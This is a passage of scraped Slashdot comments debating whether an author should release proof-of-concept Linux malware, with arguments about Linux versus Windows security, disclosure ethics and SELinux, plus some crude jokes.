Windows an armed ready-shoot-gun is just a normal wall decoration.</p><p><div class="quote"><p>The only "protection" that *nix/mac systems have over Windows is that no one gives a rats ass about infecting you</p></div><p>Ok, could we please stop with this troll now ?</p><p>At one side of the range, Linux has ratter good market shares in the servers and scientific clusters domains.<br>At the other side of the range, Linux has achieved quasi-monopoly in the embed domain, specially on home routers, wireless access points, small NAS/SAN, no-brand multimedia player/harddisk-enclosures, etc.</p><p>That's a lot of Linux running machines. The later are always connected to network, the former have even access to high-speed connections. This should make them more desirable to be infected isn't it ? Yet, there has not been an outbreak similar to Code Red on Linux. Simply because the default security settings, and the heterogeneity of distributions making it a hard to read moving target.</p><p>There are a lot of reasons while blackhats would be interested in attacking Linux, but despite this Windows is still the low-hanging fruit.</p></div>
	</htmltext>
<tokenext>Um , and this is different from a Windows virus how ?
{ ... } It 's not because your system is any more secure against " CLICK HERE TO WIN FREE XBOX 360 " infections.Windows XP way : Simply click on some random downloaded .EXE to install it with full adminsitrative right.Linux way : First switch to a priviledged account ( gksudo , kdesu , etc .
) Fire up your distribution package manager ( YaST , Synaptic , etc .
or zypper , apt-get , etc .
for command line lovers ) Look for desired package in list available from default repositoryEventually add a new repository if the default one does n't feature the software you want.In short there are 2 main differences between the windows and unices environment : Access rights : in windows everyone , including the cat running across the keyboard have full admin privileges.in linux , mac os X and other unices , users ( and cats ) have only user-level access and must switch to some other access account to gain further privilege.Install habits in windows 99 \ % of the software is downloaded and installed from random location on the web .
That means that the average user is used to download and install random crap.in linux 99 \ % of the sofrware comes from official repositories which have been veted to contain only legitimate software .
Users have to go through additional steps to get access to crap .
And most user wo n't bother because it works for them 99 \ % of the time without having to resort to.There 's another big difference , specific to opensource environment like Linux and BSD ( and not other unices ) : There only exist one single Windows : The windows sold by Microsoft .
If some malware works on the black-hat 's test PC , it will probably workThere are countless different distributions of distribution each with subtly different versions of key components .
Some malware targetting bug # 263748 on kernel 2.6.30-patch52 of Ubuntora 3.1415 wo n't necessarily work on other distribution .
( Although the above only regards malwares exploiting * bugs * , not payload which are simple regular softwares ) .With Vista and Seven , Microsoft has attempted to fix some of these problems .
Nonetheless , the fix is still a lot noisy ( " Cancel or Allow ?
" ) to the point that some user simply start to blindly " Yes-click-through " and the protecting effect is lost .
And users are still trained to install crap by downloading it from random websites.With Linux , these advantages become a handicap regarding commercial softwares : They have to target multiple combination of softwares in distributions ( unlike open-source software where the package are vetted by the distribution maintainers themselves thanks to the source being available for that puprose ) .
And these software are not just a package in a regular repository , making them inaccessible using the regular method.There is indeed no software which is 100 \ % guaranteed secure.But !
There 's still a difference like between putting a real fence around your house and having a dog on one side , and just stick a paper with " do n't rob us " written on it on the other side.And , no matter what , some users will always find a way to shoot themselves in foot.But on Unix , the gun is locked behind a glass door and must have a security pin removed before being able to shoot the foot , whereas on Windows an armed ready-shoot-gun is just a normal wall decoration.The only " protection " that * nix/mac systems have over Windows is that no one gives a rats ass about infecting youOk , could we please stop with this troll now ? At one side of the range , Linux has ratter good market shares in the servers and scientific clusters domains.At the other side of the range , Linux has achieved quasi-monopoly in the embed domain , specially on home routers , wireless access points , small NAS/SAN , no-brand multimedia player/harddisk-enclosures , etc.That 's a lot of Linux running machines .
The later are always connected to network , the former have even access to high-speed connections .
This should make them more desirable to be infected is n't it ?
Yet , there has not been an outbreak similar to Code Red on Linux .
Simply because the default security settings , and the heterogeneity of distributions making it a hard to read moving target.There are a lot of reasons while blackhats would be interested in attacking Linux , but despite this Windows is still the low-hanging fruit .</tokentext>
<sentencetext>Um, and this is different from a Windows virus how?
{...} It's not because your system is any more secure against "CLICK HERE TO WIN FREE XBOX 360" infections.Windows XP way : Simply click on some random downloaded .EXE to install it with full adminsitrative right.Linux way : First switch to a priviledged account (gksudo, kdesu, etc.
)Fire up your distribution package manager (YaST, Synaptic, etc.
or zypper, apt-get, etc.
for command line lovers)Look for desired package in list available from default repositoryEventually add a new repository if the default one doesn't feature the software you want.In short there are 2 main differences between the windows and unices environment : Access rights: in windows everyone, including the cat running across the keyboard have full admin privileges.in linux, mac os X and other unices, users (and cats) have only user-level access and must switch to some other access account to gain further privilege.Install habits in windows 99\% of the software is downloaded and installed from random location on the web.
That means that the average user is used to download and install random crap.in linux 99\% of the sofrware comes from official repositories which have been veted to contain only legitimate software.
Users have to go through additional steps to get access to crap.
And most user won't bother because it works for them 99\% of the time without having to resort to.There's another big difference, specific to opensource environment like Linux and BSD (and not other unices): There only exist one single Windows : The windows sold by Microsoft.
If some malware works on the black-hat's test PC, it will probably workThere are countless different distributions of distribution each with subtly different versions of key components.
Some malware targetting bug  #263748 on kernel 2.6.30-patch52 of Ubuntora 3.1415 won't necessarily work on other distribution.
(Although the above only regards malwares exploiting *bugs*, not payload which are simple regular softwares).With Vista and Seven, Microsoft has attempted to fix some of these problems.
Nonetheless, the fix is still a lot noisy ("Cancel or Allow ?
") to the point that some user simply start to blindly "Yes-click-through" and the protecting effect is lost.
And users are still trained to install crap by downloading it from random websites.With Linux, these advantages become a handicap regarding commercial softwares : They have to target multiple combination of softwares in distributions (unlike open-source software where the package are vetted by the distribution maintainers themselves thanks to the source being available for that puprose).
And these software are not just a package in a regular repository, making them inaccessible using the regular method.There is indeed no software which is 100\% guaranteed secure.But !
There's still a difference like between putting a real fence around your house and having a dog on one side, and just stick a paper with "don't rob us" written on it on the other side.And, no matter what, some users will always find a way to shoot themselves in foot.But on Unix, the gun is locked behind a glass door and must have a security pin removed before being able to shoot the foot, whereas on Windows an armed ready-shoot-gun is just a normal wall decoration.The only "protection" that *nix/mac systems have over Windows is that no one gives a rats ass about infecting youOk, could we please stop with this troll now ?At one side of the range, Linux has ratter good market shares in the servers and scientific clusters domains.At the other side of the range, Linux has achieved quasi-monopoly in the embed domain, specially on home routers, wireless access points, small NAS/SAN, no-brand multimedia player/harddisk-enclosures, etc.That's a lot of Linux running machines.
The later are always connected to network, the former have even access to high-speed connections.
This should make them more desirable to be infected isn't it ?
Yet, there has not been an outbreak similar to Code Red on Linux.
Simply because the default security settings, and the heterogeneity of distributions making it a hard to read moving target.There are a lot of reasons while blackhats would be interested in attacking Linux, but despite this Windows is still the low-hanging fruit.
	</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30279696</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30279982</id>
	<title>Consider...</title>
	<author>sonamchauhan</author>
	<datestamp>1259609340000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext><p>... Consider the 'Rick Astley' iPhone semi-malware released last month that affected jailbroken iPhones.</p><p>Someone's now put a deadlier payload on the same code.</p></htmltext>
<tokenext>... Consider the 'Rick Astley ' iPhone semi-malware released last month that affected jailbroken iPhones.Someone 's now put a deadlier payload on the same code .</tokentext>
<sentencetext>... Consider the 'Rick Astley' iPhone semi-malware released last month that affected jailbroken iPhones.Someone's now put a deadlier payload on the same code.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30281174</id>
	<title>Why ask?</title>
	<author>Anonymous</author>
	<datestamp>1259666040000</datestamp>
	<modclass>None</modclass>
	<modscore>0</modscore>
	<htmltext><p>Releasing it to the public will tarnish your reputation (If you have one,) Not to mention the parasites that will try to adapt it and use it to exploit people.<br>You are an idiot. Please create software that people will benefit from and enjoy using instead of garbage.</p></htmltext>
<tokenext>Releasing it to the public will tarnish your reputation ( If you have one , ) Not to mention the parasites that will try to adapt it and use it to exploit people.You are an idiot .
Please create software that people will benefit from and enjoy using instead of garbage .</tokentext>
<sentencetext>Releasing it to the public will tarnish your reputation (If you have one,) Not to mention the parasites that will try to adapt it and use it to exploit people.You are an idiot.
Please create software that people will benefit from and enjoy using instead of garbage.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30305102</id>
	<title>Malware</title>
	<author>SolarFlea</author>
	<datestamp>1259584440000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext> Just send it to me. I'll keep it safe.</htmltext>
<tokenext>Just send it to me .
I 'll keep it safe .</tokentext>
<sentencetext> Just send it to me.
I'll keep it safe.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30282314</id>
	<title>Idiot</title>
	<author>Legion303</author>
	<datestamp>1259678280000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext><p>"If executed by the user"</p><p>We're done here. Next time try a remote exploit requiring no user action. They do exist.</p></htmltext>
<tokenext>" If executed by the user " We 're done here .
Next time try a remote exploit requiring no user action .
They do exist .</tokentext>
<sentencetext>"If executed by the user"We're done here.
Next time try a remote exploit requiring no user action.
They do exist.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278818</id>
	<title>Smell test</title>
	<author>Anonymous</author>
	<datestamp>1259597640000</datestamp>
	<modclass>Insightful</modclass>
	<modscore>5</modscore>
	<htmltext><p>The claim is that a PHP injection on a web server is going to also infect user-owned tarballs and wine executables and root-owned shell scripts without exploiting a privilege escalation hole?  Either his webserver is configured to run as root, or this claim doesn't pass the smell test.</p></htmltext>
<tokenext>The claim is that a PHP injection on a web server is going to also infect user-owned tarballs and wine executables and root-owned shell scripts without exploiting a privilege escalation hole ?
Either his webserver is configured to run as root , or this claim does n't pass the smell test .</tokentext>
<sentencetext>The claim is that a PHP injection on a web server is going to also infect user-owned tarballs and wine executables and root-owned shell scripts without exploiting a privilege escalation hole?
Either his webserver is configured to run as root, or this claim doesn't pass the smell test.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30281198</id>
	<title>Hrmm. Let us ponder the question...</title>
	<author>Anachragnome</author>
	<datestamp>1259666220000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext><p>Release it privately to some of the "good guys" so they can fix it?</p><p>Can Linux be modified to prevent such malware from being run on any given machine? If so, why would you not want to help close such a glaring hole in the OS, while maintaining the least amount of disruption?</p><p>I see malware as something that needs fixing. You seriously do not?</p><p>To be honest, I don't really see why you are asking<nobr> <wbr></nobr>/.</p><p>You should be taking this straight to the folks that work on this stuff...uh...erm...Hrmm.<nobr> <wbr></nobr>/exit stage, left</p></htmltext>
<tokenext>Release it privately to some of the " good guys " so they can fix it ? Can Linux be modified to prevent such malware from being run on any given machine ?
If so , why would you not want to help close such a glaring hole in the OS , while maintaining the least amount of disruption ? I see malware as something that needs fixing .
You seriously do not ? To be honest , I do n't really see why you are asking /.You should be taking this straight to the folks that work on this stuff...uh...erm...Hrmm .
/exit stage , left</tokentext>
<sentencetext>Release it privately to some of the "good guys" so they can fix it?Can Linux be modified to prevent such malware from being run on any given machine?
If so, why would you not want to help close such a glaring hole in the OS, while maintaining the least amount of disruption?I see malware as something that needs fixing.
You seriously do not?To be honest, I don't really see why you are asking /.You should be taking this straight to the folks that work on this stuff...uh...erm...Hrmm.
/exit stage, left</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30291588</id>
	<title>Re:It does harm!!!!</title>
	<author>mysidia</author>
	<datestamp>1259674560000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext><p>
The obvious solution would be to continue the renovations, and make it as <b>unpleasant</b> as possible for someone to try to live there.
</p><p>
For instance, by not having any utilities installed while the perpetual renovation prevents it.
</p><p>
By fencing off the place, having the driveway blocked, etc.
</p></htmltext>
<tokenext>The obvious solution would be to continue the renovations , and make it as unpleasant as possible for someone to try to live there .
For instance , by not having any utilities installed while the perpetual renovation prevents it .
By fencing off the place , having the driveway blocked , etc .</tokentext>
<sentencetext>
The obvious solution would be to continue the renovations, and make it as unpleasant as possible for someone to try to live there.
For instance, by not having any utilities installed while the perpetual renovation prevents it.
By fencing off the place, having the driveway blocked, etc.
</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30280830</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30280530</id>
	<title>I run Linux</title>
	<author>OrangeTide</author>
	<datestamp>1259659740000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext><p>And I'm not worried at all. Peeling back some "nasty" multi vector injection into start-up and cron will probably take me less time to clean up than it took the author to write.</p></htmltext>
<tokenext>And I 'm not worried at all .
Peeling back some " nasty " multi vector injection into start-up and cron will probably take me less time to clean up than it took the author to write .</tokentext>
<sentencetext>And I'm not worried at all.
Peeling back some "nasty" multi vector injection into start-up and cron will probably take me less time to clean up than it took the author to write.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30279992</id>
	<title>Silly</title>
	<author>vadim\_t</author>
	<datestamp>1259609460000</datestamp>
	<modclass>Insightful</modclass>
	<modscore>2</modscore>
	<htmltext><p>Linux has two main things over Windows:</p><p>First one is that people can't accidentally execute some random program they downloaded with their browser. They have to intentionally save it somewhere, chmod +x, then run it. There's no "ok, ok, ok, yes I am stupid" sequence of warning dialog button selections that's going to do that, so it takes very intentional actions to run some random code you got from the web.</p><p>The second one is that Linux users don't, as a normal thing, run random programs they downloaded from the web. They generally install packages provided by their distribution. If a Linux user needs a RAR compressor they don't go hunt it around the web, possibly landing on a page offering a trojaned version, they "apt-get install" their distribution's verified version.</p><p>The first means people are very unlikely to run your code by accident, the second that you have to provide a good reason to run your malicious code.</p><p>I think that all this really proves is that if you really insist on running untrusted code on your system it can go and screw with your system (or user account). Well, duh. The question isn't whether it can happen at all, it's how easily it can happen by accident or lack of attention. If the user really insists on shooting their foot there's little anybody can do about that.</p><p>But, suppose that Linux got lots of stupid desktop users, who'd download fluffy\_kittens.sh and actually go through the steps they need to run it. In that case distributions could add some extra security quite easily, by for instance denying the user the ability to run programs from non-root owned directories (grsecurity does this). This would make it so that even if the user does download your script, sets the permissions, and tries to run it, it will fail to work anyway.</p><p>Now of course there's the ld.so workaround, but that's not going to happen from the GUI, and the distribution could always patch their ld.so to obey the grsecurity restrictions</p><p>Given all this, IMO, this exercise proves very little. It proves that if you manage to convince the user to intentionally run untrusted code, it'll be able to do nasty things. But this is a given on any system that's not locked down in a really fascist manner. It'll take a cell phone-like environment with sandboxed applications to defeat that. And even there applications must be allowed to do potentially harmful things to be able to do some entirely legitimate functions.</p><p>At that point you have two possibilities: you completely refuse to run unsigned code (pissing off the user), or ask the user "do you want to let this program delete all your data?" and allow them to shoot their own foot.</p></htmltext>
<tokenext>Linux has two main things over Windows : First one is that people ca n't accidentally execute some random program they downloaded with their browser .
They have to intentionally save it somewhere , chmod + x , then run it .
There 's no " ok , ok , ok , yes I am stupid " sequence of warning dialog button selections that 's going to do that , so it takes very intentional actions to run some random code you got from the web.The second one is that Linux users do n't , as a normal thing , run random programs they downloaded from the web .
They generally install packages provided by their distribution .
If a Linux user needs a RAR compressor they do n't go hunt it around the web , possibly landing on a page offering a trojaned version , they " apt-get install " their distribution 's verified version.The first means people are very unlikely to run your code by accident , the second that you have to provide a good reason to run your malicious code.I think that all this really proves is that if you really insist on running untrusted code on your system it can go and screw with your system ( or user account ) .
Well , duh .
The question is n't whether it can happen at all , it 's how easily it can happen by accident or lack of attention .
If the user really insists on shooting their foot there 's little anybody can do about that.But , suppose that Linux got lots of stupid desktop users , who 'd download fluffy \ _kittens.sh and actually go through the steps they need to run it .
In that case distributions could add some extra security quite easily , by for instance denying the user the ability to run programs from non-root owned directories ( grsecurity does this ) .
This would make it so that even if the user does download your script , sets the permissions , and tries to run it , it will fail to work anyway.Now of course there 's the ld.so workaround , but that 's not going to happen from the GUI , and the distribution could always patch their ld.so to obey the grsecurity restrictionsGiven all this , IMO , this exercise proves very little .
It proves that if you manage to convince the user to intentionally run untrusted code , it 'll be able to do nasty things .
But this is a given on any system that 's not locked down in a really fascist manner .
It 'll take a cell phone-like environment with sandboxed applications to defeat that .
And even there applications must be allowed to do potentially harmful things to be able to do some entirely legitimate functions.At that point you have two possibilities : you completely refuse to run unsigned code ( pissing off the user ) , or ask the user " do you want to let this program delete all your data ?
" and allow them to shoot their own foot .</tokentext>
<sentencetext>Linux has two main things over Windows:First one is that people can't accidentally execute some random program they downloaded with their browser.
They have to intentionally save it somewhere, chmod +x, then run it.
There's no "ok, ok, ok, yes I am stupid" sequence of warning dialog button selections that's going to do that, so it takes very intentional actions to run some random code you got from the web.The second one is that Linux users don't, as a normal thing, run random programs they downloaded from the web.
They generally install packages provided by their distribution.
If a Linux user needs a RAR compressor they don't go hunt it around the web, possibly landing on a page offering a trojaned version, they "apt-get install" their distribution's verified version.The first means people are very unlikely to run your code by accident, the second that you have to provide a good reason to run your malicious code.I think that all this really proves is that if you really insist on running untrusted code on your system it can go and screw with your system (or user account).
Well, duh.
The question isn't whether it can happen at all, it's how easily it can happen by accident or lack of attention.
If the user really insists on shooting their foot there's little anybody can do about that.But, suppose that Linux got lots of stupid desktop users, who'd download fluffy\_kittens.sh and actually go through the steps they need to run it.
In that case distributions could add some extra security quite easily, by for instance denying the user the ability to run programs from non-root owned directories (grsecurity does this).
This would make it so that even if the user does download your script, sets the permissions, and tries to run it, it will fail to work anyway.Now of course there's the ld.so workaround, but that's not going to happen from the GUI, and the distribution could always patch their ld.so to obey the grsecurity restrictionsGiven all this, IMO, this exercise proves very little.
It proves that if you manage to convince the user to intentionally run untrusted code, it'll be able to do nasty things.
But this is a given on any system that's not locked down in a really fascist manner.
It'll take a cell phone-like environment with sandboxed applications to defeat that.
And even there applications must be allowed to do potentially harmful things to be able to do some entirely legitimate functions.At that point you have two possibilities: you completely refuse to run unsigned code (pissing off the user), or ask the user "do you want to let this program delete all your data?
" and allow them to shoot their own foot.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30279142</id>
	<title>Then use it for good</title>
	<author>halcyon1234</author>
	<datestamp>1259600520000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext><p>
If you can truly spread this as easy as possible, then do so. But put a payload into it that closes all the holes it slips through. Proof of concept achieved, morals remain intact. </p></htmltext>
<tokenext>If you can truly spread this as easy as possible , then do so .
But put a payload into it that closes all the holes it slips through .
Proof of concept achieved , morals remain intact .</tokentext>
<sentencetext>
If you can truly spread this as easy as possible, then do so.
But put a payload into it that closes all the holes it slips through.
Proof of concept achieved, morals remain intact. </sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30284586</id>
	<title>Re:It does harm!!!!</title>
	<author>bluefoxlucid</author>
	<datestamp>1259688960000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext><p><div class="quote"><p>Lets put it another way.  Even if I left my house door wide open, opened all the windows etc.  It still does not give you the right to come in and f*ck with my house.</p></div><p>
I'm more inclined to f*ck with your wife, actually.
</p></div>
	</htmltext>
<tokenext>Lets put it another way .
Even if I left my house door wide open , opened all the windows etc .
It still does not give you the right to come in and f * ck with my house .
I 'm more inclined to f * ck with your wife , actually .</tokentext>
<sentencetext>Lets put it another way.
Even if I left my house door wide open, opened all the windows etc.
It still does not give you the right to come in and f*ck with my house.
I'm more inclined to f*ck with your wife, actually.

	</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278810</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278918</id>
	<title>Easy.</title>
	<author>nhytefall</author>
	<datestamp>1259598360000</datestamp>
	<modclass>Interestin</modclass>
	<modscore>2</modscore>
	<htmltext>Since, despite the popular belief, the idea of a grey/black/white hacker being distinct <i>solely</i> because of intent is, at best, a falsity, the idea that one could release something with the potential of being as destructive as TFS claims is a no-brainer.
<br> <br>
The answer is no.  Under no circumstances should the package be released.
<br> <br>
Because, to release the code is <i> <b>no different than</b></i>  than saying "I only illegally accessed your systems, Mr. FBI, to show you how it could be done.  I am honest little boy/girl".</htmltext>
<tokenext>Since , despite the popular belief , the idea of a grey/black/white hacker being distinct solely because of intent is , at best , a falsity , the idea that one could release something with the potential of being as destructive as TFS claims is a no-brainer .
The answer is no .
Under no circumstances should the package be released .
Because , to release the code is no different than than saying " I only illegally accessed your systems , Mr. FBI , to show you how it could be done .
I am honest little boy/girl " .</tokentext>
<sentencetext>Since, despite the popular belief, the idea of a grey/black/white hacker being distinct solely because of intent is, at best, a falsity, the idea that one could release something with the potential of being as destructive as TFS claims is a no-brainer.
The answer is no.
Under no circumstances should the package be released.
Because, to release the code is  no different than  than saying "I only illegally accessed your systems, Mr. FBI, to show you how it could be done.
I am honest little boy/girl".</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30279290</id>
	<title>Re:Newly retrodden ground</title>
	<author>fucket</author>
	<datestamp>1259602020000</datestamp>
	<modclass>Funny</modclass>
	<modscore>2</modscore>
	<htmltext>It's probably already in emacs.</htmltext>
<tokenext>It 's probably already in emacs .</tokentext>
<sentencetext>It's probably already in emacs.</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278682</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278682</id>
	<title>Newly retrodden ground</title>
	<author>Anonymous</author>
	<datestamp>1259596500000</datestamp>
	<modclass>Insightful</modclass>
	<modscore>5</modscore>
	<htmltext><p>This question is posed as if this is new ground.  As if this hasn't been done before - without questions of morality and with distinctly less noble intent.  All this worry about inserting a malicious payload is wasted.  The script kiddies already have better options at their disposal.</p></htmltext>
<tokenext>This question is posed as if this is new ground .
As if this has n't been done before - without questions of morality and with distinctly less noble intent .
All this worry about inserting a malicious payload is wasted .
The script kiddies already have better options at their disposal .</tokentext>
<sentencetext>This question is posed as if this is new ground.
As if this hasn't been done before - without questions of morality and with distinctly less noble intent.
All this worry about inserting a malicious payload is wasted.
The script kiddies already have better options at their disposal.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278904</id>
	<title>Obscurity</title>
	<author>thecoolbean</author>
	<datestamp>1259598240000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext><p>Security through obscurity isn't. Publish.</p></htmltext>
<tokenext>Security through obscurity is n't .
Publish .</tokentext>
<sentencetext>Security through obscurity isn't.
Publish.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30279920</id>
	<title>Re:Dear Slashdot</title>
	<author>savuporo</author>
	<datestamp>1259608200000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext><i>don't know the difference between a "funnycats.avi" and "funnycats.avi.exe"</i>
<br> <br>
Whats the difference ? The kittens get executed by a god in the second one, because of all the people masturbating ?</htmltext>
<tokenext>do n't know the difference between a " funnycats.avi " and " funnycats.avi.exe " Whats the difference ?
The kittens get executed by a god in the second one , because of all the people masturbating ?</tokentext>
<sentencetext>don't know the difference between a "funnycats.avi" and "funnycats.avi.exe"
 
Whats the difference ?
The kittens get executed by a god in the second one, because of all the people masturbating ?</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30279146</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30279694</id>
	<title>Open Source it</title>
	<author>BountyX</author>
	<datestamp>1259605800000</datestamp>
	<modclass>Funny</modclass>
	<modscore>4</modscore>
	<htmltext>Open source it, that way we can all contribute to the malware and discuss if it should use gtk or qt. We know that gnome users will refuse to install anything with qt dependencies and kde users will refuse to install gtk+ dependencies. None of the windows malware coders are willing to release their code to us, so we are limited on integration, especially with wifi. I personally think we should target gnome users, they like stepping on people -- just look at how condescending their logo is. Plus I have a grudge against the way they put their contributers down. Once we get enough malwared machines we can convince windows malware coders to support our platform.</htmltext>
<tokenext>Open source it , that way we can all contribute to the malware and discuss if it should use gtk or qt .
We know that gnome users will refuse to install anything with qt dependencies and kde users will refuse to install gtk + dependencies .
None of the windows malware coders are willing to release their code to us , so we are limited on integration , especially with wifi .
I personally think we should target gnome users , they like stepping on people -- just look at how condescending their logo is .
Plus I have a grudge against the way they put their contributers down .
Once we get enough malwared machines we can convince windows malware coders to support our platform .</tokentext>
<sentencetext>Open source it, that way we can all contribute to the malware and discuss if it should use gtk or qt.
We know that gnome users will refuse to install anything with qt dependencies and kde users will refuse to install gtk+ dependencies.
None of the windows malware coders are willing to release their code to us, so we are limited on integration, especially with wifi.
I personally think we should target gnome users, they like stepping on people -- just look at how condescending their logo is.
Plus I have a grudge against the way they put their contributers down.
Once we get enough malwared machines we can convince windows malware coders to support our platform.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30280060</id>
	<title>Re:SELinux on a a server?</title>
	<author>WuphonsReach</author>
	<datestamp>1259610540000</datestamp>
	<modclass>Informativ</modclass>
	<modscore>3</modscore>
	<htmltext>SELinux, in a lot of cases, is basically file system permissions on steroids.  Daemons run inside a domain, files and ports get labeled with SELinux labels.  Then you define what and how the domain is allowed to touch.  (And it's more fine grained then just "read / write".)<br>
<br>
Sorta like how you define what a user is allowed to touch on the file system by assigning group membership and file permissions.<br>
<br>
If the SELinux policies are very tight and the service is well behaved and you can easily define the allowed actions, things work well.  It just gets trickier when daemons are not well defined and tend to talk to random ports and touch random files.  Just like coming up with a reasonable set of permissions and group membership for a user that allows them to get their job done without constantly pestering you, it can be a bit of an art form to define SELinux policies.<br>
<br>
(There's probably more to it then describing it as file permissions on steroids, but it gets the general idea across.  The system is only as secure as the labeling and policies.)</htmltext>
<tokenext>SELinux , in a lot of cases , is basically file system permissions on steroids .
Daemons run inside a domain , files and ports get labeled with SELinux labels .
Then you define what and how the domain is allowed to touch .
( And it 's more fine grained then just " read / write " .
) Sorta like how you define what a user is allowed to touch on the file system by assigning group membership and file permissions .
If the SELinux policies are very tight and the service is well behaved and you can easily define the allowed actions , things work well .
It just gets trickier when daemons are not well defined and tend to talk to random ports and touch random files .
Just like coming up with a reasonable set of permissions and group membership for a user that allows them to get their job done without constantly pestering you , it can be a bit of an art form to define SELinux policies .
( There 's probably more to it then describing it as file permissions on steroids , but it gets the general idea across .
The system is only as secure as the labeling and policies .
)</tokentext>
<sentencetext>SELinux, in a lot of cases, is basically file system permissions on steroids.
Daemons run inside a domain, files and ports get labeled with SELinux labels.
Then you define what and how the domain is allowed to touch.
(And it's more fine grained then just "read / write".
)

Sorta like how you define what a user is allowed to touch on the file system by assigning group membership and file permissions.
If the SELinux policies are very tight and the service is well behaved and you can easily define the allowed actions, things work well.
It just gets trickier when daemons are not well defined and tend to talk to random ports and touch random files.
Just like coming up with a reasonable set of permissions and group membership for a user that allows them to get their job done without constantly pestering you, it can be a bit of an art form to define SELinux policies.
(There's probably more to it then describing it as file permissions on steroids, but it gets the general idea across.
The system is only as secure as the labeling and policies.
)</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278628</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30280840</id>
	<title>Re:Not new. Not Interesting.</title>
	<author>buchanmilne</author>
	<datestamp>1259662920000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext><p><div class="quote"><p>If Linux malware is unheard of, why does McAfee sell <a href="http://www.mcafee.com/us/enterprise/products/system\_security/servers/linuxshield.html" title="mcafee.com">LinuxSheld</a> [mcafee.com]?</p></div><p>The  question isn't why they sell it, but why customers buy it, and that is most likely for "Benefit" 4:</p><p><div class="quote"><p>LinuxShield protects Microsoft Windows systems by blocking Microsoft Windows viruses from passing through the Linux environment</p></div></div>
	</htmltext>
<tokenext>If Linux malware is unheard of , why does McAfee sell LinuxSheld [ mcafee.com ] ? The question is n't why they sell it , but why customers buy it , and that is most likely for " Benefit " 4 : LinuxShield protects Microsoft Windows systems by blocking Microsoft Windows viruses from passing through the Linux environment</tokentext>
<sentencetext>If Linux malware is unheard of, why does McAfee sell LinuxSheld [mcafee.com]?The  question isn't why they sell it, but why customers buy it, and that is most likely for "Benefit" 4:LinuxShield protects Microsoft Windows systems by blocking Microsoft Windows viruses from passing through the Linux environment
	</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30279246</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30307604</id>
	<title>Re:Dear Slashdot</title>
	<author>Anonymous</author>
	<datestamp>1259603820000</datestamp>
	<modclass>None</modclass>
	<modscore>0</modscore>
	<htmltext><p><div class="quote"><p> People need to learn to take reasonable steps to protect themselves from being punched in the face</p></div><p>I agree. In your case, "reasonable steps" would probably start with learning to keep your mouth shut.</p></div>
	</htmltext>
<tokenext>People need to learn to take reasonable steps to protect themselves from being punched in the faceI agree .
In your case , " reasonable steps " would probably start with learning to keep your mouth shut .</tokentext>
<sentencetext> People need to learn to take reasonable steps to protect themselves from being punched in the faceI agree.
In your case, "reasonable steps" would probably start with learning to keep your mouth shut.
	</sentencetext>
